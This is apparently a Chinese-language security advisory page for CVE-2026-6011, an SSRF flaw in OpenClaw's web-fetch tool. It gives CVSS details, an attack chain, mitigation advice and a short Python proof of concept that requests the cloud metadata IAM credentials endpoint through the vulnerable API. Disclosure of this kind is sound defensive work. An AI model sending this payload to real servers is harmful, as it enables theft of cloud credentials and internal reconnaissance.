CVE-2026-6011 CVSS 5.6 中危

CVE-2026-6011 OpenClaw 服务端请求伪造漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6011

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

5.6 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 在 2026.1.26 及之前的版本中存在严重安全漏洞。问题出在 src/agents/tools/web-fetch.ts 文件的 assertPublicHostname 处理程序，涉及未知功能处理缺陷。攻击者可利用此缺陷远程发起服务端请求伪造（SSRF）攻击。尽管利用难度较大且复杂度高，但攻击可能造成服务器信息泄露、完整性受损及可用性降低。鉴于已有公开利用代码，用户需立即采取行动进行修复。

技术细节

该漏洞源于 OpenClaw 组件 `src/agents/tools/web-fetch.ts` 中的 `assertPublicHostname` 处理程序未能正确验证或限制用户提供的输入。在特定功能的处理过程中，应用程序允许攻击者控制服务器发出的 HTTP 请求的目标地址。由于缺乏对外部 URL 的严格校验（例如未正确过滤内网地址或云元数据服务地址），攻击者可以向内网敏感资源（如 127.0.0.1, 169.254.169.254）发送请求。攻击向量为网络（AV:N），无需用户交互（UI:N）且无需认证（PR:N）。攻击者可以通过构造特定的恶意请求绕过现有的 hostname 检查逻辑，诱导服务器向攻击者指定的目标发起连接，从而扫描内网端口、读取本地敏感文件或利用内部服务漏洞。CVSS 3.1 评分为 5.6，主要影响机密性、完整性和可用性。修复补丁 b623557a2ec7e271bda003eb3ac33fbb2e218505 已经发布，主要是加强了 hostname 的断言逻辑，建议检查代码差异以理解具体的绕过技术。

攻击链分析

STEP 1

侦察

攻击者识别出目标运行的是 OpenClaw 2026.1.26 或更早版本，并确认 web-fetch.ts 接口可访问。

STEP 2

构造载荷

攻击者构造包含恶意内部地址（如云元数据服务地址）的请求，旨在绕过 assertPublicHostname 的检查。

STEP 3

发送请求

攻击者向目标服务器发送特制的 HTTP 请求，触发服务器端的 fetch 功能。

STEP 4

执行SSRF

服务器解析请求，向攻击者指定的内部地址发起连接，获取敏感信息或进行内网探测。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable OpenClaw instance
target_url = "http://<target-host>:<port>/api/web-fetch"

# Malicious payload attempting to access internal metadata (SSRF)
# Exploiting the assertPublicHostname bypass
payload = {
    "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "options": {}
}

try:
    # Send the malicious request
    response = requests.post(target_url, json=payload)
    
    # Check if the attack was successful
    if response.status_code == 200:
        print("[+] SSRF Exploit Successful!")
        print("[+] Response from internal service:")
        print(response.text)
    else:
        print("[-] Exploit failed or target patched.")
        print("Status Code:", response.status_code)
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

OpenClaw <= 2026.1.26

防御指南

临时缓解措施

如果无法立即升级，建议在应用防火墙或网络层限制服务器对内部网络（如 127.0.0.1、内网段、169.254.169.254）的出站请求，并监控异常的外部流量。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表